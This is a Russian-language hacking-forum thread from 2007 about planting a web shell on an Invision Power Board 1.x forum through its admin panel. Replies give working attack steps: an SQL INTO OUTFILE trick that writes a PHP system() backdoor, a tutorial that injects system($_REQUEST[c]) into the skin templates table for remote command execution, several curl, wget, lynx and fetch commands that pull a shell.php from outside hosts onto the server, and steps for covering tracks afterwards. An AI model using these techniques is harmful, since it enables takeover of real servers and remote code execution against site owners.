В общем есть форум ипб 1.3
есть доступ к админке
Но...
нельзя залиться через смайлы

не могу через скуль залить в аплоадс (пишет что доступ запрещен)

через шаблоны выдает: "Этот файл является неправильным файлом шаблона для Invision Power Board"

Не смог понять как воспользоваться скулей типа
CREATE TABLE `ibf_shell` (`shl` TEXT NOT NULL) TYPE = MYISAM ; INSERT INTO `ibf_shell` ( `shl` ) VALUES (`пхп-код`); SELECT `shl` FROM `ibf_shell` INTO OUTFILE `путь/имяфайла.php` DROP TABLE `ibf_shell`
какой именно пхп-код нужен и путь/имя файла чего именно?

Ах да. http запрос тоже не проходит


Люди добрые помогите плз. С меня плюсы

php-code: system($_GET["cmd"]);

путь до папки аплоадс ( найдешь в генеральных настройках)

Спасибо но не прокатило.
Выдал что
Access denied for user: 'тра-та-та@localhost' (Using password: YES)

у тебя нет прав, как правило они только у рута

ну это понятно. И какой же выход?

Привет, я DeusTirael.
Сейчас я покажу как можно залить шелл в ИПБ 1.* если не катит способ через смайлы.

Заходим в админку, выбираем SQL Management > mySQL Toolbox > 120_skin_templates

Нужно в столбце func_name изменить значение calendar_start_form
на "aaa(){}}; system($_REQUEST[c]); class qwerty{function ggg"

Для этого делаем один запрос:
update 120_skin_templates set func_name="aaa(){}}; system($_REQUEST[c]); class qwerty{function bbb" where func_name="calendar_start_form";

Теперь ставим Use safe mode skins? > Yes

Готово! Заходим в календарь и в параметре 'c' передаем команды.

Заливаем нормальный шелл:
curl --output /papka/na/servere/shell.php http://site.com/shell.php
wget -o /papka/na/servere/shell.php http://site.com/shell.php
get http://site.com/shell.php > /papka/na/servere/shell.php
links -source "http://site.com/shell.php" > /papka/na/servere/shell.php
lynx -source http://site.com/shell.php > /papka/na/servere/shell.php
fetch -o /papka/na/servere/shell.php http://site.com/shell.php
get http://test2.ru/shells/rst.txt > uploads/sh.php

Чистим после себя:
Use safe mode skins? > No
update 120_skin_templates set func_name="calendar_start_form" where func_name="aaa(){}}; system($_REQUEST[c]); class qwerty{function bbb";



18.03.2007 by DeusTirael специально для DaMaGeLaB.OrG
Видео использовать только в целях ознакомления.

Это я тоже делал. Тоже не катит. Выплевывает ошибку при смене safemod skins > да
Грубая ошибка: Невозможно произвести запись в файл conf_global - изменения не сохранены. Попробуйте изменить атрибут CHMOD на 0777

http://dump.ru/files/9/97097095/ вот!

видео... заливка шелла на ипб через настройки

http://dump.ru/files/9/97097095/ вот!

видео... заливка шелла на ипб через настройки

Способ не актуален для ипб 1.*, он только для 2.*.*

да извените проморгал версию форума...

http://www.someshit.net/showthread.php?t=141

а точнее http://www.someshit.net/showpost.php?p=357&postcount=2

Я ж написал что через шаблоны тоже не может залиться. Если только вы подскажете решение данной проблемы почему при заливки через шаблон выдает
Этот файл является неправильным файлом шаблона для Invision Power Board